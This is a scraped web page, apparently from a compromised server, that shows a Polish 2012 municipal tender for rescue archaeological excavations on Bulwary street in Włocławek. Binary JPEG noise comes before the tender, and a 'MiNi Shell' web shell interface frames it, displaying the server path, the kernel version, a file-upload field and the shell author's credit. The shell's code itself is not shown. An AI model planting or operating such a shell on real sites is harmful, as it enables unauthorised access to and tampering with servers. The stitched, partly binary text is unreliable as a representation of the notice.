JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120425/93881-N-2012.html

<p class="kh_header"><b>Włocławek: Przebudowa ul. Bulwary im. M. J. Piłsudskiego - przeprowadzenie wyprzedzających ratunkowych badań archeologicznych metodą wykopaliskową</b><br>
<b>Numer ogłoszenia: 93881 - 2012; data zamieszczenia: 25.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg , ul. Zielna 13/21, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4121323, faks 054 4121323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdwloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. Bulwary im. M. J. Piłsudskiego - przeprowadzenie wyprzedzających ratunkowych badań archeologicznych metodą wykopaliskową.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wskazane zadanie realizowane będzie na odcinku ul. Bulwary im. M. J. Piłsudskiego (dz. 2)1 KM23) od ulicy Św. Jana (dz. 108 KM 46), do chodnika przebiegającego przed elewacją zachodnią kościoła parafialnego p.w. Św. Jana (kilometraż inwestycji 0+360 - 0+410). Przedmiotem zamówienia jest wykonanie ratowniczych badań archeologicznych na obszarze wskazanym zgodnie z wydaną przez Kujawsko - Pomorskiego Wojewódzkiego Konserwatora Zabytków (dalej WKZ) decyzją nr AR)55)2012 z dnia 14.03.2012.
Celem badań jest eksploracja archeologiczna i udokumentowanie w źródłach naukowo - konserwatorskich znalezisk odkrytych w trakcie prowadzonego wcześniej nadzoru archeologicznego, oraz opracowania wytycznych dotyczących sposobu zachowania zabytkowych reliktów architektury. Przedmiotowe badania zostaną przeprowadzone w okresie wskazanym w decyzji WKZ z dnia 14.03.2012.
Na wysokości prezbiterium kościoła p.w. Św. Jana w centralnej części wykopu, pod warstwą nowożytnego nasypu natrafiono na relikty średniowiecznego muru ceglano-kamiennego zlokalizowanego na osi wschód-zachód o łącznej zachowanej długości 24,5 m. W licu muru czytelny zachowany gotycki (jednowozówkowy) układ cegieł. Od strony północnej mur został wzmocniony rzędem 6 przypór. Najdalej wysunięta na zachód przypora usytuowana została w narożniku, utworzonym przez omawiany mur oraz drugi odsłonięty na długości około 2,5 m mur o analogicznej strukturze, zlokalizowany na osi północ-południe. Mur od strony północnej urwany najprawdopodobniej w trakcie prac związanych z instalacja sieci wodociągowej, zlokalizowanej wzdłuż północnego skraju ul. Bulwary. Od strony zachodniej, na przedłużeniu pierwszego muru odsłonięto fragment fundamentu ceglano kamiennego, stanowiącego rodzaj przypory narożnej. Stan wiedzy na obecnym etapie prac nie pozwala na jednoznaczne określenie funkcji odkrytych struktur, jednak przypuszczać można, iż mamy do czynienia z wcześniejszym założeniem kościoła p.w. Św. Jana, którego istnienie odnotowane zostało w źródłach pisanych jednak bez podania lokalizacji. 
Po stronie południowej odsłoniętego muru natrafiono na skupiska kości ludzkich, pochodzących ze zniszczonej w wyniku wcześniej prowadzonych prac budowlanych (w tym budowa sieci wodociągowej oraz prace związane z budową i funkcjonowaniem ul. Bulwary) części przykościelnego cmentarza. Ponadto podczas prowadzonych prac odsłonięto 4 groby w układzie anatomicznym, stanowiące część przykościelnego cmentarza. We wszystkich przypadkach szkielety złożone zostały na osi wschód-zachód, głowami skierowane na zachód. W obrębie odsłoniętych grobów, za wyjątkiem fragmentu szpilki zlokalizowanej przy czaszce w grobie nr 5 nie stwierdzono występowania materiału zabytkowego umożliwiającego określenie chronologii odkrytych grobów. W dniu 14 marca br. Decyzją Wojewódzkiego Konserwatora Zabytków prace budowlane w tej części ulicy Bulwary zostały przerwane, a dotychczas pełniony nadzór archeologiczny przekształcony został w ratownicze badania archeologiczne.
	Wymienione zadanie jest zlokalizowane w obrębie wpisanej do rejestru zabytków strefy ochrony konserwatorskiej Dzielnicy Starego Miasta we Włocławku. Konieczność i zasady przeprowadzenia badań wynikają z wytycznych Wojewódzkiego Konserwatora Zabytków.
Szczegółowy zakres zadania inwestycyjnego p.n. Przebudowa ul. Bulwary im. M. J. Piłsudskiego - przeprowadzenie wyprzedzających ratowniczych badań archeologicznych metodą wykopaliskową  obejmuje:
-Przygotowanie dokumentacji i uzyskanie Decyzji WKZ na przeprowadzenie ratunkowych badań archeologicznych (1. Przygotowanie kwerendy archiwalnej, 2. Przygotowanie wniosku do WKZ z załącznikami (mapa, program badań archeologicznych, zgoda muzeum na przechowywanie zabytków, zgoda właściciela terenu na badania, oświadczenia archeologa o nie zaleganiu z dokumentacją i finansowaniu badań) 3. Złożenie dokumentacji w Delegaturze WUOZ we Włocławku celem uzyskania decyzji).
-Wykonanie wyprzedzających ratowniczych badań archeologicznych w terenie w okresie do czterech tygodni wraz z opracowaniem pełnej dokumentacji zezwalającej na dalsze prowadzenie prac budowlanych dla przedmiotowej inwestycji drogowej. Badania należy wykonać zgodnie ze standardami określonymi w Rozporządzeniu Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011r (Dz. U. 2011 Nr 165, poz. 987 z późn. zm) w zakresie badań archeologicznych oraz ustawą o ochronie zabytków i opiece nad zabytkami z dnia 23 lipca 2003r (Dz. U. 2003 NR 162, poz. 1568 z późn. zm)
-Wykonanie prac gabinetowych celem opracowania dokumentacji końcowej
-Wstępną konserwację i pełną inwentaryzację zabytków, wykonanie analizy antropologicznej odkrytych pochówków, opracowanie chronologiczne odkrytych zabytków, opracowanie cyfrowe dokumentacji w tym map i rysunków, 
-opracowanie wyników i sprawozdania z wnioskami konserwatorskimi.
-Przygotowanie i przekazanie zabytków do muzeum
-Przekazanie do WKZ po zakończeniu prac wstępnego sprawozdania z badań, zgodnego ze standardem dokumentacji badań archeologicznych, zawartym w Rozporządzeniu Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 pozwalającego na wydanie decyzji zezwalającej na dalsze prowadzenie prac inwestycyjnych w tym miejscu jest podstawą wypłacenia wynagrodzenia za wykonanie wyprzedzających ratowniczych badań archeologicznych.
-Zabezpieczenie terenu prac archeologicznych w sposób zapewniający bezpieczeństwo ludzi i mienia, zgodnie z rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy( Dz. U. nr 129, poz. 844, z późn. zm.) oraz przepisami prawa budowlanego

W zakresie oferty wykonania usługi należy również uwzględnić:
-koszty związane z pracą koparki wspomagającej eksplorację (ok. 7- 8 dni)
-wywóz ziemi na miejscu, utylizację
-inwentaryzację geodezyjną odkrytych reliktów murów
-wszelkie inne koszty niezbędne do prawidłowego wykonania zamówienia

Przewiduje się możliwość udzielenia zamówień uzupełniających:
        Z przeprowadzonej wcześniej kwerendy archiwalnej dotyczącej m.in. prowadzonych w pobliżu badań wykopaliskowych wynika, iż można się spodziewać pozostałości wczesnośredniowiecznego osadnictwa wiązanego z znajdującym się w pobliżu grodem (od strony pałacu biskupiego) oraz pozostałości późnośredniowiecznego cmentarza wraz z reliktami kościoła..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiajacy przewiduje możliwość udzielenia zamowień uzupełniających, o których mowa w art. 67 pkt. 6 ustawy Pzp do wysokości 50% wartości zamowienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.19.14-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonywał:
-  przynajmniej 1 zadanie dotyczące zrealizowania wyprzedzających ratunkowych badań archeologicznych o wartości minimum 10.000,00 zł netto, 
Na potwierdzenie powyższego należy załączyć dokument potwierdzający, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami zdolnymi do wykonania zamówienia niezbędnymi do realizacji zamówienia w liczbie; 
-  minimum jedna osoba posiadająca : kwalifikacje uprawniające do wykonywania badań archeologicznych zgodnie z  §26 zgodnie z Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011r.(Dz.U.2011.165 poz.987 ze zm.) tj.:

§ 26. 1. Badania archeologiczne może prowadzić osoba, która posiada tytuł zawodowy magistra uzyskany po ukończeniu studiów wyższych na kierunku archeologia oraz odbyła co najmniej 12-miesięczną praktykę w zakresie tych badań.
2. Przy ustalaniu czasu trwania praktyki, o której mowa w ust. 1, nie uwzględnia się uczestnictwa w badaniach archeologicznych prowadzonych metodą powierzchniową, nadzorów archeologicznych i rozpoznawania obiektów archeologicznych przy pomocy odwiertów oraz opracowywania dokumentacji zabytków ruchomych odkrytych w trakcie badań archeologicznych.
lub pisemne zobowiązanie innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt 8 SIWZ, Wykonawca wykazał osoby, którymi będzie dysponował.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>załącznik nr 1 formularz oferty, załącznik nr 3 oświadczenie wykonawcy o spełnieniu warunkow udziału w postepowaniu, pełnomocnictwo do podpisania oferty, jezeli nie wynika ono z odrębnych dokumentow, np. z odpisu z rejestru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku
do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji:
a) udzielenia w trakcie realizacji umowy zamówień dodatkowych lub uzupełniających,  
    związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony  
    termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia),
  b)   wystąpienia niekorzystnych warunków atmosferycznych powodujących wstrzymanie lub 
        przerwanie badań w okresie dłuższym niż 5 dni kalendarzowych, przy czym przesunięcie  
        terminu robót nastąpi o tyle dni, przez ile trwało ich wstrzymanie, 
c) wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia 
    niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło  
    po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski   
    żywiołowe, strajki oraz akty władzy i administracji publicznej,
d) pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego  
    lub wydania zakazu prowadzenia prac przez organ administracji publicznej o ile żądanie 
    lub wydanie zakazów nie nastąpiło z przyczyn, za które Wykonawca ponosi  
    odpowiedzialność,
e) zaleceń Kujawsko - Pomorskiego Wojewódzkiego Konserwatora Zabytków określających 
    inne terminy lub określających inne obowiązki niż wskazano w Umowie.
f)  przedłużających się terminów wydania pozwoleń i odbiorów końcowych przez Kujawsko - 
    Pomorskiego Wojewódzkiego Konserwatora Zabytków
Możliwość zmiany reprezentantów stron, przy czym osoba wskazana przez Wykonawcę musi uzyskać akceptację Kujawsko - Pomorskiego Wojewódzkiego Konserwatora Zabytków.	
Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej 
i podpisania przez obie strony.
Z wnioskiem o zmianę treści umowy może wystąpić zarówno Wykonawca, jak
i Zamawiający</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdwloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg ul. Zielna 13/21, 87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2012 godzina 10:00, miejsce: Miejski Zarząd Dróg ul. Zielna 13/21, 87-800 Włocławek pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com